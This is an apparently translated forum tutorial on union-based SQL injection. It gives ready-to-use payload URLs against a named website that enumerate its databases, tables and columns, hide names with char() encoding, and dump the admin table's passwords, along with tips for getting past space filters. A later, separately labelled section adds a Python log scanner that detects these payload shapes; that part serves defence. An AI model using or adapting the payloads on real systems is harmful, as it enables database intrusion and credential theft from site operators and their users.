The advantage is that, by combining the information_schema database with group_concat, you can read the contents of a specified database in one go, and the injection still works when LIMIT is restricted.

The drawback: when a database holds hundreds or even thousands of tables, columns and rows, reading the data out gets quite slow...

Below is a simple demonstration. I won't go into the principle much; anyone who does injection regularly already knows it. Only the important parts are shown as examples.

Adjust to the actual situation when injecting, for example if spaces are filtered, use /**/ , + and so on.

http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,database(),10,11,12,13,14,15,16,17

Read out all databases:
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(schema_name),10,11,12,13,14,15,16,17 from information_schema.SCHEMATA

Read out all tables:
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(table_name),10,11,12,13,14,15,16,17 from information_schema.tables where table_schema=database()

Read out all table columns:
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(column_name),10,11,12,13,14,15,16,17 from information_schema.COLUMNS where table_schema=database() and table_name=char(97,100,109,105,110)
(97,100,109,105,110) is the ASCII code of admin; other names are encoded the same way.

Read out the contents of the table columns:
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,group_concat(password),group_concat(admin),10,11,12,13,14,15,16,17 from admin
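Added here as a defender-side example, not part of the original post: a small Python log scanner that flags requests with the union / information_schema / group_concat shape shown above, undoes the /**/ and + space substitutes the post mentions, and decodes char(...) literals back into the name they stand for. The log lines are constructed samples; the /1.php path follows the post's URLs.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (not from the original post);
# the query strings mirror the payload shapes shown above.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /1.php?id=7 HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /1.php?id=-1%20union%20select%201,2,3,4,5,6,7,8,group_concat(schema_name),10,11,12,13,14,15,16,17%20from%20information_schema.SCHEMATA HTTP/1.1" 200 9001
10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /1.php?id=-1/**/union/**/select/**/1,2,3,4,5,6,7,8,group_concat(column_name),10,11,12,13,14,15,16,17/**/from/**/information_schema.COLUMNS/**/where/**/table_schema=database()/**/and/**/table_name=char(97,100,109,105,110) HTTP/1.1" 200 777
"""

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')
CHAR_RE = re.compile(r'char\(([\d,\s]+)\)', re.I)

def normalize(query):
    """Percent-decode, turn '+' and /**/ comments back into spaces,
    and lowercase so keyword matching sees plain words."""
    q = unquote_plus(query)
    q = re.sub(r'/\*.*?\*/', ' ', q)
    return re.sub(r'\s+', ' ', q).lower()

def decode_char_calls(q):
    """Turn each char(97,100,...) literal into the string it encodes."""
    out = []
    for m in CHAR_RE.finditer(q):
        codes = [int(c) for c in m.group(1).replace(' ', '').split(',') if c]
        out.append(''.join(chr(c) for c in codes if 0 <= c < 256))
    return out

def classify(line):
    """Return a finding dict for one log line, or None if it looks benign."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    q = normalize(m.group(1))
    if not re.search(r'\bunion\b.*\bselect\b', q):
        return None
    return {
        "schema_enum": 'information_schema' in q,   # metadata enumeration
        "aggregated": 'group_concat(' in q,          # one-shot dump pattern
        "decoded_names": decode_char_calls(q),       # e.g. ['admin']
    }

def scan(log_text):
    findings = []
    for n, ln in enumerate(log_text.splitlines(), 1):
        f = classify(ln)
        if f:
            findings.append((n, f))
    return findings
```

The scan result is a list of (line number, finding) pairs; the decoded names tell an investigator which table the attacker was probing for without re-running the payload.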